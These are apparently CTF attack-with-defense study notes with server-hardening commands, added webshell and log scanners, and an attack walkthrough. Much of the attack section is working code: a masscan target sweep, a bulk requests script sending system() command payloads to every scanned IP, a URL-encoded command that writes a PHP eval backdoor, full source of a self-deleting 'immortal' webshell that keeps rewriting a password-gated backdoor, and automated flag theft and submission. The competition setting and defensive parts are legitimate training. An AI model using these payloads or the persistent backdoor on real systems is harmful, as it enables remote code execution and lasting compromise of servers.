
AWD: a simple approach and study notes

At my first offline AWD (attack with defense) competition my thinking was too narrow and I was all over the place, so here I organise a simple approach based on the open-source AWD platforms of other experienced players and the PHP environment used in the competition.

GitHub AWD platform: https://github.com/m0xiaoxi/AWD_CTF_Platform

Hardening approach:

1. Log in to the server over SSH and change the password: passwd
2. Download the source code and back it up (FileZilla, SFTP, "ask for password" logon type):

```bash
tar -czvf /tmp/html.tar.gz /var/www/html      # compress
cd /tmp
tar -xzvf /tmp/html.tar.gz                    # extract
cp -R /tmp/var/www/html/. /var/www/html/      # copy back
mysqldump -u root -p test > test.sql          # back up the database (test = database name)
mysql -u root -p test < test.sql              # restore the database
```

3. Quick lookup commands:
  • Deploy a WAF or request logging (if the WAF/logger file itself sits under the web directory, remove the include line that the command below also inserts into that file):

```bash
find /var/www/html -name "*.php" | xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"
```

  • Quick check for webshells:

```bash
find /var/www/html -name "*.php" | xargs egrep 'assert|eval|phpinfo\(\)|\(base64_decode|shell_exec|passthru|file_put_contents\(.*\$|base64_decode\('
```

4. Webshell scanning (D盾 / D-Shield): delete trojans and backdoors.
5. Code audit (Seay): hard-code the values of vulnerable variables, etc.
6. Capture traffic:

```bash
tcpdump -t -s 0 -w /tmp/target.cap tcp and port 80
```

  -t : do not print a timestamp on each line
  -s 0 : by default tcpdump captures only 68 bytes of each packet; with -s 0 the full packet is captured
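Added example (not from the original notes): a small Python scanner that applies the same indicator list as the egrep one-liner above and additionally flags the self-rewriting "immortal shell" pattern that appears later in these notes (ignore_user_abort, set_time_limit(0), unlink(__FILE__) and a file_put_contents loop). It scans constructed in-memory PHP samples so it runs offline; the labels, the `scan_php`/`scan_tree` names and the samples are my own.

```python
import re

# Indicators from the egrep one-liner above (dangerous PHP functions), as labelled regexes.
FUNC_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "assert": re.compile(r"\bassert\s*\("),
    "system": re.compile(r"\bsystem\s*\("),
    "shell_exec": re.compile(r"\bshell_exec\s*\("),
    "passthru": re.compile(r"\bpassthru\s*\("),
    "phpinfo": re.compile(r"\bphpinfo\s*\(\s*\)"),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "file_put_contents_var": re.compile(r"\bfile_put_contents\s*\(.*\$"),
}
# Request data reaching an execution call: the one-line backdoor shape.
TAINTED_CALL = re.compile(r"\b(eval|assert|system)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)")
# Signature of the self-rewriting "immortal shell": all four parts must be present.
IMMORTAL_PARTS = [r"ignore_user_abort\s*\(\s*true\s*\)", r"set_time_limit\s*\(\s*0\s*\)",
                  r"unlink\s*\(\s*__FILE__\s*\)", r"while\s*\(\s*(1|true)\s*\)"]

def scan_php(src):
    """Return the sorted list of indicator labels found in one PHP source string."""
    hits = {name for name, pat in FUNC_PATTERNS.items() if pat.search(src)}
    if TAINTED_CALL.search(src):
        hits.add("request_to_exec")
    if all(re.search(p, src) for p in IMMORTAL_PARTS):
        hits.add("immortal_shell")
    return sorted(hits)

def scan_tree(files):
    """files: {path: source}. Returns {path: labels} for the files that have hits."""
    report = {}
    for path, src in files.items():
        labels = scan_php(src)
        if labels:
            report[path] = labels
    return report

# Constructed sample files for the demonstration (not real site code).
SAMPLES = {
    "index.php": "<?php echo 'hello'; $x = base64_encode('a'); ?>",
    ".config.php": '<?php if(md5($_GET["passwd"])=="<md5-placeholder>"){@eval($_REQUEST[cmd]);} ?>',
    "upload.php": ("<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__);"
                   " $f='.config.php'; while (1){ file_put_contents($f,$c); usleep(5000);} ?>"),
}

if __name__ == "__main__":
    for path, labels in scan_tree(SAMPLES).items():
        print(path, labels)
```

To run it against a real web root, read each `*.php` file into the `files` dict and review the hits by hand; a hit on `file_put_contents_var` alone is common in legitimate code.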

Attack approach:

1. Scan for attack targets: sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml
2. Parse scan.xml into IP.txt:

```python
import re

ipaddr_re = r"((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)"
ip_re = "addr=.*addrtype="
port_re = "portid=.*><state"
portnum_re = r"[1-9]\d*"

def readxml(path):
    results = []
    with open(path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each line
            if "addr=" in line:
                ip = re.search(ip_re, line).group()
                ip = re.search(ipaddr_re, ip).group()
                port = re.search(port_re, line).group()
                port = re.search(portnum_re, port).group()
                results.append([ip, port])
    return results

def writetxt(results):
    # written as IP.txt, the file name the bulk-request script below reads
    with open("IP.txt", "w") as f:
        for ip, port in results:
            f.write(ip + ":" + port + "\n")

def main():
    writetxt(readxml("scan.xml"))

if __name__ == '__main__':
    main()
```

3. Capture the payload with Burp, then attack in bulk:

The Burp extension Copy As Python-Requests converts a Burp request into Python requests-library code. Example output:

```python
import requests

burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);"
burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
```

Bulk-request script; the responses are written to result.txt (because the connection does not close once the immortal shell has been written, the next IP would never be reached, so a timeout should be added):

```python
import requests

def IP(IP_path):
    IP_list = []
    with open(IP_path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each line
            IP_list.append(line)
    return IP_list

def attack(IP_list):
    result_list = []

    # the parameters below must be replaced to match the actual situation
    burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian"
    burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
    burp0_headers = {"Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    burp0_data = {"cmd": "system(\"cat ../../../../flag\");"}

    url = burp0_url.split("/")
    for ip in IP_list:
        url[2] = ip
        burp0_url = "/".join(url)
        print(burp0_url)
        try:
            # the request below must be replaced to match the actual situation; a timeout is recommended
            r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)

            if r.status_code == 200:
                result_list.append(ip + "\n")
                result_list.append(r.text + "\n")
                print(r.text)
        except requests.exceptions.Timeout:
            continue
    return result_list

def write(result_list):
    with open("result.txt", "w") as f:
        for line in result_list:
            f.write(line)

def main():
    IP_list = IP("IP.txt")
    result_list = attack(IP_list)
    write(result_list)

if __name__ == '__main__':
    main()
```

4. Plant immortal shells in bulk via a preset backdoor:
Writing the immortal shell through command execution. For the GET method the payload must be URL-encoded:

```
cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B
```

Plaintext:

```php
system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');
```

5. Plant immortal shells in bulk via an upload vulnerability. 不死馬.php (the immortal shell):

```php
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.config.php';
$code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
// usage: .config.php?passwd=FPXtian&cmd=system("ls");
?>
```

6. Obtain flags in bulk via the immortal shell: construct the flag-retrieval payload, generate the requests-library parameters with the Copy As Python-Requests extension, and substitute them into the bulk-request script above.
7. Submit flags in bulk:
```python
import requests
import re

# flag_re = "flag(.*)"
flag_re = ".{32}"

def flag(flag_path):
    flag_list = []
    with open(flag_path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each line
            if re.search(flag_re, line):
                value = re.search(flag_re, line).group()
                flag_list.append(value)
    return flag_list

def submit(flag_list):
    for flag in flag_list:

        # the parameters below must be replaced to match the actual situation
        burp0_url = "http://192.168.0.103:9090"
        burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
        burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
                         "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded",
                         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
                         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                         "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate",
                         "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
        burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"}

        try:
            # the request below must be replaced to match the actual situation; a timeout is recommended
            r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
            if r.status_code == 200:
                print(flag, r.text)
        except requests.exceptions.Timeout:
            continue

def main():
    flag_list = flag("result.txt")
    submit(flag_list)

if __name__ == '__main__':
    main()
```

Follow-up defense and attack approaches:

1. Analyse the traffic: fix the vulnerabilities, or directly reuse the attack traffic of other teams to counterattack in bulk.
2. Kill the immortal shell:

```bash
# the shell from step 5 rewrites the file every 5 ms, so this loop must keep running alongside it
while true
do
    rm -f .config.php
done
```
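For step 1 (traffic analysis), an added example that is not part of the original notes: it URL-decodes the request line of constructed Apache-style access-log entries and flags the request shapes shown in these notes (an encoded `<?php` tag, `system(`/`eval(` inside a parameter, and a request to `.config.php` carrying `passwd` and `cmd`). The log format, the labels and the `analyse_line`/`analyse_log` names are assumptions of this example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Apache combined-log shape (assumed): client IP, request line, status and size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Request shapes seen in these notes, checked against the URL-decoded target.
INDICATORS = [
    ("php_tag_in_request", re.compile(r"<\?php", re.I)),
    ("exec_call_in_param", re.compile(r"\b(system|eval|assert|shell_exec|passthru)\s*\(", re.I)),
    ("hidden_config_backdoor", re.compile(r"/\.config\.php", re.I)),
]

def analyse_line(line):
    """Return (client_ip, decoded_target, labels) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))
    labels = [name for name, pat in INDICATORS if pat.search(target)]
    # A hit on .config.php carrying both passwd and cmd matches the backdoor's
    # usage pattern; only the parameter names are reported, not their values.
    qs = parse_qs(urlsplit(target).query)
    if "hidden_config_backdoor" in labels and {"passwd", "cmd"} <= set(qs):
        labels.append("backdoor_params")
    return (m.group("ip"), target, labels) if labels else None

def analyse_log(lines):
    """Group suspicious requests by client IP: {ip: [(target, labels), ...]}."""
    report = {}
    for line in lines:
        hit = analyse_line(line)
        if hit:
            ip, target, labels = hit
            report.setdefault(ip, []).append((target, labels))
    return report

# Constructed log lines for the demonstration (not captured traffic).
SAMPLE_LOG = [
    '10.0.0.2 - - [01/Jan/2021:10:00:00 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2021:10:00:01 +0800] "GET /config.php?a=system(%22ls%22); HTTP/1.1" 200 88',
    '10.0.0.7 - - [01/Jan/2021:10:00:02 +0800] "GET /config.php?a=system(%27echo%20%27%3C%3Fphp%20eval(%24_REQUEST%5Bcmd%5D)%3B%3F%3E%27%3E.config.php%27)%3B HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2021:10:00:03 +0800] "POST /images/.config.php?passwd=x&cmd=1 HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, hits in analyse_log(SAMPLE_LOG).items():
        for target, labels in hits:
            print(ip, labels, target)
```

The per-IP grouping is what makes the output usable during the match: the same source hitting `system(` on one file and then `.config.php` on another is the sequence to patch and to watch for in the tcpdump capture.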